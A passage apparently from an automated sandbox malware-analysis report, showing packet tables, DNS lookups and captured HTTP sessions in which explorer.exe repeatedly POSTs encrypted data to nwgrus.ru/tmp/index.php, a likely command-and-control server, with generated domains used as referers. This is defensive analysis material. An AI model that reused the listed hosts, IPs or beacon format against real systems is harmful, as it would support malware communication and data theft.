Oct 14, 2024 10:03:07.325234890 CEST	80	49772	109.175.29.39	192.168.2.4
Oct 14, 2024 10:03:07.325284958 CEST	80	49772	109.175.29.39	192.168.2.4
Oct 14, 2024 10:03:08.127748966 CEST	80	49772	109.175.29.39	192.168.2.4
Oct 14, 2024 10:03:08.128184080 CEST	80	49772	109.175.29.39	192.168.2.4
Oct 14, 2024 10:03:08.128601074 CEST	49772	80	192.168.2.4	109.175.29.39
Oct 14, 2024 10:03:08.128680944 CEST	49772	80	192.168.2.4	109.175.29.39
Oct 14, 2024 10:03:08.133577108 CEST	80	49772	109.175.29.39	192.168.2.4

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Oct 14, 2024 10:02:36.086679935 CEST	51865	53	192.168.2.4	1.1.1.1
Oct 14, 2024 10:02:37.077652931 CEST	51865	53	192.168.2.4	1.1.1.1
Oct 14, 2024 10:02:38.146615982 CEST	51865	53	192.168.2.4	1.1.1.1
Oct 14, 2024 10:02:38.444628954 CEST	53	51865	1.1.1.1	192.168.2.4
Oct 14, 2024 10:02:38.444684029 CEST	53	51865	1.1.1.1	192.168.2.4
Oct 14, 2024 10:02:38.444715023 CEST	53	51865	1.1.1.1	192.168.2.4
Oct 14, 2024 10:03:46.790268898 CEST	49292	53	192.168.2.4	1.1.1.1

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Oct 14, 2024 10:02:36.086679935 CEST	192.168.2.4	1.1.1.1	0xfe89	Standard query (0)	nwgrus.ru	A (IP address)	IN (0x0001)	false
Oct 14, 2024 10:02:37.077652931 CEST	192.168.2.4	1.1.1.1	0xfe89	Standard query (0)	nwgrus.ru	A (IP address)	IN (0x0001)	false
Oct 14, 2024 10:02:38.146615982 CEST	192.168.2.4	1.1.1.1	0xfe89	Standard query (0)	nwgrus.ru	A (IP address)	IN (0x0001)	false
Oct 14, 2024 10:03:46.790268898 CEST	192.168.2.4	1.1.1.1	0x10e6	Standard query (0)	api.msn.com	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Oct 14, 2024 10:02:38.444628954 CEST	1.1.1.1	192.168.2.4	0xfe89	No error (0)	nwgrus.ru		109.175.29.39	A (IP address)	IN (0x0001)	false
Oct 14, 2024 10:02:38.444628954 CEST	1.1.1.1	192.168.2.4	0xfe89	No error (0)	nwgrus.ru		212.112.110.243	A (IP address)	IN (0x0001)	false
Oct 14, 2024 10:02:38.444628954 CEST	1.1.1.1	192.168.2.4	0xfe89	No error (0)	nwgrus.ru		190.147.128.172	A (IP address)	IN (0x0001)	false
Oct 14, 2024 10:02:38.444628954 CEST	1.1.1.1	192.168.2.4	0xfe89	No error (0)	nwgrus.ru		116.58.10.60	A (IP address)	IN (0x0001)	false
Oct 14, 2024 10:02:38.444628954 CEST	1.1.1.1	192.168.2.4	0xfe89	No error (0)	nwgrus.ru		190.249.249.14	A (IP address)	IN (0x0001)	false
Oct 14, 2024 10:02:38.444628954 CEST	1.1.1.1	192.168.2.4	0xfe89	No error (0)	nwgrus.ru		190.187.52.42	A (IP address)	IN (0x0001)	false
Oct 14, 2024 10:02:38.444628954 CEST	1.1.1.1	192.168.2.4	0xfe89	No error (0)	nwgrus.ru		63.143.98.185	A (IP address)	IN (0x0001)	false
Oct 14, 2024 10:02:38.444628954 CEST	1.1.1.1	192.168.2.4	0xfe89	No error (0)	nwgrus.ru		211.171.233.126	A (IP address)	IN (0x0001)	false
Oct 14, 2024 10:02:38.444628954 CEST	1.1.1.1	192.168.2.4	0xfe89	No error (0)	nwgrus.ru		201.212.52.197	A (IP address)	IN (0x0001)	false
Oct 14, 2024 10:02:38.444628954 CEST	1.1.1.1	192.168.2.4	0xfe89	No error (0)	nwgrus.ru		189.181.56.137	A (IP address)	IN (0x0001)	false
Oct 14, 2024 10:02:38.444684029 CEST	1.1.1.1	192.168.2.4	0xfe89	No error (0)	nwgrus.ru		109.175.29.39	A (IP address)	IN (0x0001)	false
Oct 14, 2024 10:02:38.444684029 CEST	1.1.1.1	192.168.2.4	0xfe89	No error (0)	nwgrus.ru		212.112.110.243	A (IP address)	IN (0x0001)	false
Oct 14, 2024 10:02:38.444684029 CEST	1.1.1.1	192.168.2.4	0xfe89	No error (0)	nwgrus.ru		190.147.128.172	A (IP address)	IN (0x0001)	false
Oct 14, 2024 10:02:38.444684029 CEST	1.1.1.1	192.168.2.4	0xfe89	No error (0)	nwgrus.ru		116.58.10.60	A (IP address)	IN (0x0001)	false
Oct 14, 2024 10:02:38.444684029 CEST	1.1.1.1	192.168.2.4	0xfe89	No error (0)	nwgrus.ru		190.249.249.14	A (IP address)	IN (0x0001)	false
Oct 14, 2024 10:02:38.444684029 CEST	1.1.1.1	192.168.2.4	0xfe89	No error (0)	nwgrus.ru		190.187.52.42	A (IP address)	IN (0x0001)	false
Oct 14, 2024 10:02:38.444684029 CEST	1.1.1.1	192.168.2.4	0xfe89	No error (0)	nwgrus.ru		63.143.98.185	A (IP address)	IN (0x0001)	false
Oct 14, 2024 10:02:38.444684029 CEST	1.1.1.1	192.168.2.4	0xfe89	No error (0)	nwgrus.ru		211.171.233.126	A (IP address)	IN (0x0001)	false
Oct 14, 2024 10:02:38.444684029 CEST	1.1.1.1	192.168.2.4	0xfe89	No error (0)	nwgrus.ru		201.212.52.197	A (IP address)	IN (0x0001)	false
Oct 14, 2024 10:02:38.444684029 CEST	1.1.1.1	192.168.2.4	0xfe89	No error (0)	nwgrus.ru		189.181.56.137	A (IP address)	IN (0x0001)	false
Oct 14, 2024 10:02:38.444715023 CEST	1.1.1.1	192.168.2.4	0xfe89	No error (0)	nwgrus.ru		109.175.29.39	A (IP address)	IN (0x0001)	false
Oct 14, 2024 10:02:38.444715023 CEST	1.1.1.1	192.168.2.4	0xfe89	No error (0)	nwgrus.ru		212.112.110.243	A (IP address)	IN (0x0001)	false
Oct 14, 2024 10:02:38.444715023 CEST	1.1.1.1	192.168.2.4	0xfe89	No error (0)	nwgrus.ru		190.147.128.172	A (IP address)	IN (0x0001)	false
Oct 14, 2024 10:02:38.444715023 CEST	1.1.1.1	192.168.2.4	0xfe89	No error (0)	nwgrus.ru		116.58.10.60	A (IP address)	IN (0x0001)	false
Oct 14, 2024 10:02:38.444715023 CEST	1.1.1.1	192.168.2.4	0xfe89	No error (0)	nwgrus.ru		190.249.249.14	A (IP address)	IN (0x0001)	false
Oct 14, 2024 10:02:38.444715023 CEST	1.1.1.1	192.168.2.4	0xfe89	No error (0)	nwgrus.ru		190.187.52.42	A (IP address)	IN (0x0001)	false
Oct 14, 2024 10:02:38.444715023 CEST	1.1.1.1	192.168.2.4	0xfe89	No error (0)	nwgrus.ru		63.143.98.185	A (IP address)	IN (0x0001)	false
Oct 14, 2024 10:02:38.444715023 CEST	1.1.1.1	192.168.2.4	0xfe89	No error (0)	nwgrus.ru		211.171.233.126	A (IP address)	IN (0x0001)	false
Oct 14, 2024 10:02:38.444715023 CEST	1.1.1.1	192.168.2.4	0xfe89	No error (0)	nwgrus.ru		201.212.52.197	A (IP address)	IN (0x0001)	false
Oct 14, 2024 10:02:38.444715023 CEST	1.1.1.1	192.168.2.4	0xfe89	No error (0)	nwgrus.ru		189.181.56.137	A (IP address)	IN (0x0001)	false
Oct 14, 2024 10:03:46.797075033 CEST	1.1.1.1	192.168.2.4	0x10e6	No error (0)	api.msn.com	api-msn-com.a-0003.a-msedge.net		CNAME (Canonical name)	IN (0x0001)	false

HTTP Request Dependency Graph

fywxucdqvauxl.com

nwgrus.ru

dfegowhoygianb.net

mxjkymtnwdus.net

vsicdygcbqjjlt.com

mrabobimhfaodhs.com

hgmakgqsadecxk.net

vyvtnoktgixr.org

kpctqqwaapll.com

uwrjqoiyikclmp.org

irqjlvxvguaa.net

otrldmaxlwsqg.net

axdumywgicw.net

drcsfcxotsike.org

ljowgttltjb.com

qqrvxoxcuflyv.org

bwkcgbjusdxgntcy.net

oivflmljlhkww.com

ametqvtlvslgmj.net

iwhghyqwahgf.net

bvmbuxbytsytdm.org

nnhkspmojwnsnbxu.net

yvnodxcwkvd.org

dgiwvsfymyh.com

wrjytrffmsivlanr.net

estmwlacexvuyc.com

hvvqajwisec.net

kctacxfnspruuv.com

ijnkeenpcqt.com

lnnfpwyulse.org

pkoncbxvmuq.com

ievjgxgogeu.net

kavychcxkrxbq.net

nsmkoqlnxxds.com

gljrhsxnugi.net

ublngteflakx.net

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.4	49736	109.175.29.39	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Oct 14, 2024 10:02:38.453902006 CEST	280	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://fywxucdqvauxl.com/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 240 Host: nwgrus.ru
Oct 14, 2024 10:02:38.453923941 CEST	240	OUT	Data Raw: 3b 6e 59 15 86 ca 1b 51 de d9 c6 05 77 72 0f bf 79 79 ba e7 6d 06 96 12 09 78 7a 9c 43 c3 c1 6c e8 2c b4 2b 72 19 23 11 e9 9b 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 19 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 20 3e bc af Data Ascii: ;nYQwryymxzCl,+r#? 9Yt M@NA .[k,vu >R^N\b'BH5j}.40`Hw_-4qO{$M ;{"^bkV/_TH.qZX/]Oq`cz%
Oct 14, 2024 10:02:39.243119955 CEST	152	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Mon, 14 Oct 2024 08:02:39 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 04 00 00 00 72 e8 87 e8 Data Ascii: r

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.4	49737	109.175.29.39	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Oct 14, 2024 10:02:39.252496958 CEST	281	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://dfegowhoygianb.net/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 168 Host: nwgrus.ru
Oct 14, 2024 10:02:39.252541065 CEST	168	OUT	Data Raw: 3b 6e 59 15 86 ca 1b 51 de d9 c6 05 77 72 0f bf 79 79 ba e7 6d 06 96 12 09 78 7a 9c 43 c3 c1 6c e8 2c b4 2b 72 19 23 11 e9 9b 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 19 1d c7 41 20 ff 2d 5b 0a 6b 2c 90 f5 76 0b 75 64 2d fc f0 Data Ascii: ;nYQwryymxzCl,+r#? 9Yt M@NA -[k,vud-s%esNAX\W-DD;g@6_RN}#i$[
Oct 14, 2024 10:02:40.057665110 CEST	484	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Mon, 14 Oct 2024 08:02:39 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED] Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.4	49738	109.175.29.39	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Oct 14, 2024 10:02:40.065501928 CEST	279	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://mxjkymtnwdus.net/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 158 Host: nwgrus.ru
Oct 14, 2024 10:02:40.065593004 CEST	158	OUT	Data Raw: 3b 6e 59 15 86 ca 1b 51 de d9 c6 05 77 72 0f bf 79 79 ba e7 6d 06 96 12 09 78 7a 9c 43 c3 c1 6c e8 2c b4 2b 72 19 23 11 e9 9b 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 19 1d c7 41 20 ff 2d 5b 0b 6b 2c 90 f5 76 0b 75 76 22 bc f1 Data Ascii: ;nYQwryymxzCl,+r#? 9Yt M@NA -[k,vuv"v\Q9mR'7ht~Kv9?!sz-@BU&/
Oct 14, 2024 10:02:40.996191025 CEST	484	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Mon, 14 Oct 2024 08:02:40 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED] Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.4	49739	109.175.29.39	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Oct 14, 2024 10:02:41.037493944 CEST	281	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://vsicdygcbqjjlt.com/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 253 Host: nwgrus.ru
Oct 14, 2024 10:02:41.037493944 CEST	253	OUT	Data Raw: 3b 6e 59 15 86 ca 1b 51 de d9 c6 05 77 72 0f bf 79 79 ba e7 6d 06 96 12 09 78 7a 9c 43 c3 c1 6c e8 2c b4 2b 72 19 23 11 e9 9b 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 19 1d c7 41 20 ff 2d 5b 08 6b 2c 90 f5 76 0b 75 70 40 fb 9b Data Ascii: ;nYQwryymxzCl,+r#? 9Yt M@NA -[k,vup@E @Zk1]]XvnvVB0`YzNN{-<SS~$A\Z.PW-x {Wi3112qBA\Bqg{(#4
Oct 14, 2024 10:02:41.830756903 CEST	137	IN	HTTP/1.1 200 OK Server: nginx/1.26.0 Date: Mon, 14 Oct 2024 08:02:41 GMT Content-Type: text/html; charset=utf-8 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.4	49740	109.175.29.39	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Oct 14, 2024 10:02:41.838699102 CEST	282	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://mrabobimhfaodhs.com/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 289 Host: nwgrus.ru
Oct 14, 2024 10:02:41.838699102 CEST	289	OUT	Data Raw: 3b 6e 59 15 86 ca 1b 51 de d9 c6 05 77 72 0f bf 79 79 ba e7 6d 06 96 12 09 78 7a 9c 43 c3 c1 6c e8 2c b4 2b 72 19 23 11 e9 9b 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 19 1d c7 41 20 ff 2d 5b 09 6b 2c 90 f5 76 0b 75 58 15 f3 fb Data Ascii: ;nYQwryymxzCl,+r#? 9Yt M@NA -[k,vuXbhObWFE@UhaD8~~}nG8R+1Bnut$<`&\|,X\}3z'!!9}=.FzGDy=_<,
Oct 14, 2024 10:02:42.637752056 CEST	484	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Mon, 14 Oct 2024 08:02:42 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED] Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.4	49741	109.175.29.39	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Oct 14, 2024 10:02:42.647681952 CEST	281	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://hgmakgqsadecxk.net/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 297 Host: nwgrus.ru
Oct 14, 2024 10:02:42.647697926 CEST	297	OUT	Data Raw: 3b 6e 59 15 86 ca 1b 51 de d9 c6 05 77 72 0f bf 79 79 ba e7 6d 06 96 12 09 78 7a 9c 43 c3 c1 6c e8 2c b4 2b 72 19 23 11 e9 9b 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 19 1d c7 41 20 ff 2d 5b 0e 6b 2c 90 f5 76 0b 75 44 2d ba 88 Data Ascii: ;nYQwryymxzCl,+r#? 9Yt M@NA -[k,vuD-o&kkem@c;MF8m!i%IVBMF!uG/O$kICRIU82^o->o7r21!F6A
Oct 14, 2024 10:02:43.564790964 CEST	137	IN	HTTP/1.1 200 OK Server: nginx/1.26.0 Date: Mon, 14 Oct 2024 08:02:43 GMT Content-Type: text/html; charset=utf-8 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.4	49742	109.175.29.39	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Oct 14, 2024 10:02:43.586003065 CEST	279	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://vyvtnoktgixr.org/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 146 Host: nwgrus.ru
Oct 14, 2024 10:02:43.586028099 CEST	146	OUT	Data Raw: 3b 6e 59 15 86 ca 1b 51 de d9 c6 05 77 72 0f bf 79 79 ba e7 6d 06 96 12 09 78 7a 9c 43 c3 c1 6c e8 2c b4 2b 72 19 23 11 e9 9b 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 19 1d c7 41 20 ff 2d 5b 0f 6b 2c 90 f5 76 0b 75 2f 24 d3 e7 Data Ascii: ;nYQwryymxzCl,+r#? 9Yt M@NA -[k,vu/$Dkrlns!n2SLgh_>[L3h%
Oct 14, 2024 10:02:44.373192072 CEST	137	IN	HTTP/1.1 200 OK Server: nginx/1.26.0 Date: Mon, 14 Oct 2024 08:02:44 GMT Content-Type: text/html; charset=utf-8 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.4	49743	109.175.29.39	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Oct 14, 2024 10:02:44.384479046 CEST	279	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://kpctqqwaapll.com/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 259 Host: nwgrus.ru
Oct 14, 2024 10:02:44.384479046 CEST	259	OUT	Data Raw: 3b 6e 59 15 86 ca 1b 51 de d9 c6 05 77 72 0f bf 79 79 ba e7 6d 06 96 12 09 78 7a 9c 43 c3 c1 6c e8 2c b4 2b 72 19 23 11 e9 9b 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 19 1d c7 41 20 ff 2d 5b 0c 6b 2c 90 f5 76 0b 75 2b 07 e8 e9 Data Ascii: ;nYQwryymxzCl,+r#? 9Yt M@NA -[k,vu+`)~c=lR]~(]_;n}NX@?']Q_@IWBA0sBFj<DGxcM vV}Wsmm\Ul
Oct 14, 2024 10:02:45.213128090 CEST	484	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Mon, 14 Oct 2024 08:02:45 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED] Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.4	49744	109.175.29.39	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Oct 14, 2024 10:02:45.222959995 CEST	281	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://uwrjqoiyikclmp.org/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 276 Host: nwgrus.ru
Oct 14, 2024 10:02:45.222994089 CEST	276	OUT	Data Raw: 3b 6e 59 15 86 ca 1b 51 de d9 c6 05 77 72 0f bf 79 79 ba e7 6d 06 96 12 09 78 7a 9c 43 c3 c1 6c e8 2c b4 2b 72 19 23 11 e9 9b 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 19 1d c7 41 20 ff 2d 5b 0d 6b 2c 90 f5 76 0b 75 34 40 d9 a7 Data Ascii: ;nYQwryymxzCl,+r#? 9Yt M@NA -[k,vu4@s[Rkd:S r^DBIW*?Z7%ggQ'A$1XX^,e=J7-'>U5hmSL\|e!V?m
Oct 14, 2024 10:02:46.040815115 CEST	484	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Mon, 14 Oct 2024 08:02:45 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 